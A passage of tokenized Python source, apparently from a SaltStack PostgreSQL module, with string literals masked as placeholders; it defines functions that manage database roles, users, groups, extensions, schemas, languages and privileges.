format ( sub_cmd , group , name ) <EOL> return sub_cmd <EOL> def _role_create ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createroles = None , <EOL> createuser = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> login = None , <EOL> connlimit = None , <EOL> inherit = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> typ_ = '<STR_LIT>' , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if user_exists ( name , user , host , port , maintenance_db , <EOL> password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' . format ( typ_ . capitalize ( ) , name ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> sub_cmd = '<STR_LIT>' . format ( sub_cmd , _role_cmd_args ( <EOL> name , <EOL> typ_ = typ_ , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> inherit = inherit , <EOL> createdb = createdb , <EOL> createroles = createroles , <EOL> createuser = createuser , <EOL> superuser = superuser , <EOL> groups = groups , <EOL> replication = replication , <EOL> rolepassword = rolepassword <EOL> ) ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def user_create ( username , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> inherit = None , <EOL> login = None , <EOL> connlimit = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_create ( username , <EOL> typ_ = 
'<STR_LIT:user>' , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> createdb = createdb , <EOL> createuser = createuser , <EOL> createroles = createroles , <EOL> inherit = inherit , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> encrypted = encrypted , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def _role_update ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> typ_ = '<STR_LIT>' , <EOL> createroles = None , <EOL> inherit = None , <EOL> login = None , <EOL> connlimit = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> role = role_get ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> return_password = False ) <EOL> if not bool ( role ) : <EOL> log . info ( <EOL> '<STR_LIT>' . format ( typ_ . capitalize ( ) , name ) <EOL> ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> sub_cmd = '<STR_LIT>' . 
format ( sub_cmd , _role_cmd_args ( <EOL> name , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> inherit = inherit , <EOL> createdb = createdb , <EOL> createuser = createuser , <EOL> createroles = createroles , <EOL> superuser = superuser , <EOL> groups = groups , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> db_role = role <EOL> ) ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def user_update ( username , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> inherit = None , <EOL> login = None , <EOL> connlimit = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_update ( username , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> typ_ = '<STR_LIT:user>' , <EOL> inherit = inherit , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> createdb = createdb , <EOL> createuser = createuser , <EOL> createroles = createroles , <EOL> encrypted = encrypted , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def _role_remove ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not user_exists ( name , user , host , port , maintenance_db , <EOL> password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' . 
format ( name ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password ) <EOL> if not user_exists ( name , user , host , port , maintenance_db , <EOL> password = password , runas = runas ) : <EOL> return True <EOL> else : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return False <EOL> def available_extensions ( user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> exts = [ ] <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> ret = psql_query ( query , user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> exts = { } <EOL> for row in ret : <EOL> if '<STR_LIT>' in row and '<STR_LIT:name>' in row : <EOL> exts [ row [ '<STR_LIT:name>' ] ] = row <EOL> return exts <EOL> def installed_extensions ( user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> exts = [ ] <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> ret = psql_query ( query , user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> exts = { } <EOL> for row in ret : <EOL> if '<STR_LIT>' in row and '<STR_LIT>' in row : <EOL> exts [ row [ '<STR_LIT>' ] ] = row <EOL> return exts <EOL> def get_available_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return available_extensions ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password 
= password , <EOL> runas = runas ) . get ( name , None ) <EOL> def get_installed_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return installed_extensions ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) . get ( name , None ) <EOL> def is_available_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> exts = available_extensions ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if name . lower ( ) in [ <EOL> a . lower ( ) <EOL> for a in exts <EOL> ] : <EOL> return True <EOL> return False <EOL> def _pg_is_older_ext_ver ( a , b ) : <EOL> '''<STR_LIT>''' <EOL> return a < b <EOL> def is_installed_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> installed_ext = get_installed_extension ( <EOL> name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return bool ( installed_ext ) <EOL> def create_metadata ( name , <EOL> ext_version = None , <EOL> schema = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> installed_ext = get_installed_extension ( <EOL> name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> ret = [ _EXTENSION_NOT_INSTALLED ] <EOL> if 
installed_ext : <EOL> ret = [ _EXTENSION_INSTALLED ] <EOL> if ( <EOL> ext_version is not None <EOL> and _pg_is_older_ext_ver ( <EOL> installed_ext . get ( '<STR_LIT>' , ext_version ) , <EOL> ext_version <EOL> ) <EOL> ) : <EOL> ret . append ( _EXTENSION_TO_UPGRADE ) <EOL> if ( <EOL> schema is not None <EOL> and installed_ext . get ( '<STR_LIT>' , '<STR_LIT:f>' ) == '<STR_LIT:t>' <EOL> and installed_ext . get ( '<STR_LIT>' , schema ) != schema <EOL> ) : <EOL> ret . append ( _EXTENSION_TO_MOVE ) <EOL> return ret <EOL> def drop_extension ( name , <EOL> if_exists = None , <EOL> restrict = None , <EOL> cascade = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if cascade is None : <EOL> cascade = True <EOL> if if_exists is None : <EOL> if_exists = False <EOL> if restrict is None : <EOL> restrict = False <EOL> args = [ '<STR_LIT>' ] <EOL> if if_exists : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( name ) <EOL> if cascade : <EOL> args . append ( '<STR_LIT>' ) <EOL> if restrict : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( '<STR_LIT:;>' ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) <EOL> if is_installed_extension ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) : <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password ) <EOL> ret = not is_installed_extension ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if not ret : <EOL> log . info ( '<STR_LIT>' . 
format ( name ) ) <EOL> return ret <EOL> def create_extension ( name , <EOL> if_not_exists = None , <EOL> schema = None , <EOL> ext_version = None , <EOL> from_version = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if if_not_exists is None : <EOL> if_not_exists = True <EOL> mtdata = create_metadata ( name , <EOL> ext_version = ext_version , <EOL> schema = schema , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> installed = _EXTENSION_NOT_INSTALLED not in mtdata <EOL> installable = is_available_extension ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if installable : <EOL> if not installed : <EOL> args = [ '<STR_LIT>' ] <EOL> if if_not_exists : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( '<STR_LIT>' . format ( name ) ) <EOL> sargs = [ ] <EOL> if schema : <EOL> sargs . append ( '<STR_LIT>' . format ( schema ) ) <EOL> if ext_version : <EOL> sargs . append ( '<STR_LIT>' . format ( ext_version ) ) <EOL> if from_version : <EOL> sargs . append ( '<STR_LIT>' . format ( from_version ) ) <EOL> if sargs : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . extend ( sargs ) <EOL> args . append ( '<STR_LIT:;>' ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) . strip ( ) <EOL> else : <EOL> args = [ ] <EOL> if schema and _EXTENSION_TO_MOVE in mtdata : <EOL> args . append ( '<STR_LIT>' . format ( <EOL> name , schema ) ) <EOL> if ext_version and _EXTENSION_TO_UPGRADE in mtdata : <EOL> args . append ( '<STR_LIT>' . format ( <EOL> name , ext_version ) ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) . 
strip ( ) <EOL> if cmd : <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password ) <EOL> mtdata = create_metadata ( name , <EOL> ext_version = ext_version , <EOL> schema = schema , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> ret = True <EOL> for i in _EXTENSION_FLAGS : <EOL> if ( i in mtdata ) and ( i != _EXTENSION_INSTALLED ) : <EOL> ret = False <EOL> if not ret : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return ret <EOL> def user_remove ( username , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_remove ( username , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> def group_create ( groupname , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> encrypted = None , <EOL> login = None , <EOL> inherit = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_create ( groupname , <EOL> user = user , <EOL> typ_ = '<STR_LIT>' , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> createdb = createdb , <EOL> createroles = createroles , <EOL> createuser = createuser , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> inherit = inherit , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , 
<EOL> runas = runas ) <EOL> def group_update ( groupname , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createroles = None , <EOL> createuser = None , <EOL> encrypted = None , <EOL> inherit = None , <EOL> login = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_update ( groupname , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> createdb = createdb , <EOL> typ_ = '<STR_LIT>' , <EOL> createroles = createroles , <EOL> createuser = createuser , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> inherit = inherit , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def group_remove ( groupname , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_remove ( groupname , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> def owner_to ( dbname , <EOL> ownername , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> sqlfile = tempfile . NamedTemporaryFile ( ) <EOL> sqlfile . write ( '<STR_LIT>' ) <EOL> sqlfile . write ( <EOL> '<STR_LIT>' . 
format ( <EOL> dbname , ownername <EOL> ) <EOL> ) <EOL> queries = ( <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ) <EOL> for fmt , query in queries : <EOL> ret = psql_query ( query , user = user , host = host , port = port , <EOL> maintenance_db = dbname , password = password , runas = runas ) <EOL> for row in ret : <EOL> sqlfile . write ( fmt . format ( owner = ownername , n = row [ '<STR_LIT:n>' ] ) + '<STR_LIT:\n>' ) <EOL> sqlfile . write ( '<STR_LIT>' ) <EOL> sqlfile . flush ( ) <EOL> os . chmod ( sqlfile . name , <NUM_LIT> ) <EOL> cmdret = _psql_prepare_and_run ( [ '<STR_LIT>' , sqlfile . name ] , <EOL> user = user , <EOL> runas = runas , <EOL> host = host , <EOL> port = port , <EOL> password = password , <EOL> maintenance_db = dbname ) <EOL> return cmdret <EOL> def schema_create ( dbname , name , owner = None , <EOL> user = None , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> if schema_exists ( dbname , name , <EOL> db_user = db_user , db_password = db_password , <EOL> db_host = db_host , db_port = db_port ) : <EOL> log . info ( '<STR_LIT>' . format ( name , dbname ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> if owner is not None : <EOL> sub_cmd = '<STR_LIT>' . 
format ( sub_cmd , owner ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> user = db_user , password = db_password , <EOL> port = db_port , host = db_host , <EOL> maintenance_db = dbname , runas = user ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def schema_remove ( dbname , name , <EOL> user = None , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> if not schema_exists ( dbname , name , <EOL> db_user = db_user , db_password = db_password , <EOL> db_host = db_host , db_port = db_port ) : <EOL> log . info ( '<STR_LIT>' . format ( name , dbname ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = user , <EOL> maintenance_db = dbname , <EOL> host = db_host , user = db_user , port = db_port , password = db_password ) <EOL> if not schema_exists ( dbname , name , <EOL> db_user = db_user , db_password = db_password , <EOL> db_host = db_host , db_port = db_port ) : <EOL> return True <EOL> else : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return False <EOL> def schema_exists ( dbname , name , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> return bool ( <EOL> schema_get ( dbname , name , <EOL> db_user = db_user , <EOL> db_host = db_host , <EOL> db_port = db_port , <EOL> db_password = db_password ) ) <EOL> def schema_get ( dbname , name , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> all_schemas = schema_list ( dbname , <EOL> db_user = db_user , <EOL> db_host = db_host , <EOL> db_port = db_port , <EOL> db_password = db_password ) <EOL> try : <EOL> return all_schemas . get ( name , None ) <EOL> except AttributeError : <EOL> log . 
error ( '<STR_LIT>' ) <EOL> return False <EOL> def schema_list ( dbname , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = ( '<STR_LIT>' . join ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ] ) ) <EOL> rows = psql_query ( query , <EOL> host = db_host , <EOL> user = db_user , <EOL> port = db_port , <EOL> maintenance_db = dbname , <EOL> password = db_password ) <EOL> for row in rows : <EOL> retrow = { } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> retrow [ key ] = row [ key ] <EOL> ret [ row [ '<STR_LIT:name>' ] ] = retrow <EOL> return ret <EOL> def language_list ( <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = '<STR_LIT>' <EOL> rows = psql_query ( <EOL> query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> ret [ row [ '<STR_LIT:Name>' ] ] = row [ '<STR_LIT:Name>' ] <EOL> return ret <EOL> def language_exists ( <EOL> name , <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> languages = language_list ( <EOL> maintenance_db , user = user , host = host , <EOL> port = port , password = password , <EOL> runas = runas ) <EOL> return name in languages <EOL> def language_create ( name , <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if language_exists ( name , maintenance_db ) : <EOL> log . info ( '<STR_LIT>' , name , maintenance_db ) <EOL> return False <EOL> query = '<STR_LIT>' . 
format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def language_remove ( name , <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not language_exists ( name , maintenance_db ) : <EOL> log . info ( '<STR_LIT>' , name , maintenance_db ) <EOL> return False <EOL> query = '<STR_LIT>' . format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> runas = runas , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def _make_privileges_list_query ( name , object_type , prepend ) : <EOL> '''<STR_LIT>''' <EOL> if object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . 
format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> return query <EOL> def _get_object_owner ( name , <EOL> object_type , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . 
join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> rows = psql_query ( <EOL> query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> try : <EOL> ret = rows [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> except IndexError : <EOL> ret = None <EOL> return ret <EOL> def _validate_privileges ( object_type , privs , privileges ) : <EOL> '''<STR_LIT>''' <EOL> if object_type != '<STR_LIT>' : <EOL> _perms = [ _PRIVILEGES_MAP [ perm ] <EOL> for perm in _PRIVILEGE_TYPE_MAP [ object_type ] ] <EOL> _perms . append ( '<STR_LIT>' ) <EOL> if object_type not in _PRIVILEGES_OBJECTS : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' . format ( object_type ) ) <EOL> if not set ( privs ) . issubset ( set ( _perms ) ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' . format ( <EOL> privileges , object_type ) ) <EOL> else : <EOL> if privileges : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _mod_priv_opts ( object_type , privileges ) : <EOL> '''<STR_LIT>''' <EOL> object_type = object_type . lower ( ) <EOL> privileges = '<STR_LIT>' if privileges is None else privileges <EOL> _privs = re . split ( r'<STR_LIT>' , privileges . 
